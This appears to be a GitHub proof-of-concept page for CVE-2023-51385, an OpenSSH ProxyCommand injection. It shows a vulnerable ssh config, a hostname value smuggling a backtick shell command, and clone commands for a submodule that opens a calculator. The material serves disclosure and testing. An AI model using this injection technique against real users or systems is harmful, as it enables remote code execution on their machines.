thinkliving2020/CVE-2023-51385-
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Folders and files
| Name | Name | Last commit message | Last commit date | |
|---|---|---|---|---|
Repository files navigation
RCE via insecure ~/.ssh/config Use of tokens like %h, %p in is quite popular to use tunnels and connection proxying using SSH.ProxyCommand Vulnerable config host *.example.com ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p Note: in my initial assessment I was under the impression that using '%h` (single quotes) would avoid this, but looks like that is still going to be vulnerable with something like: ssh://`echo helloworld` > cve.txt`foo.example.com/bar Taken from: https://man.openbsd.org/ssh_config#ProxyCommand What is in this repository A submodule which would exploit this vulnerability to pop a calculator on OSX. Try it out using: git clone https://github.com/vin01/poc-proxycommand-vulnerable --recurse-submodules or git clone git@github.com:vin01/poc-proxycommand-vulnerable.git --recurse-submodules
About
CVE-2023-51385
Resources
Stars
Watchers
Forks
Releases
No releases published
Packages 0
No packages published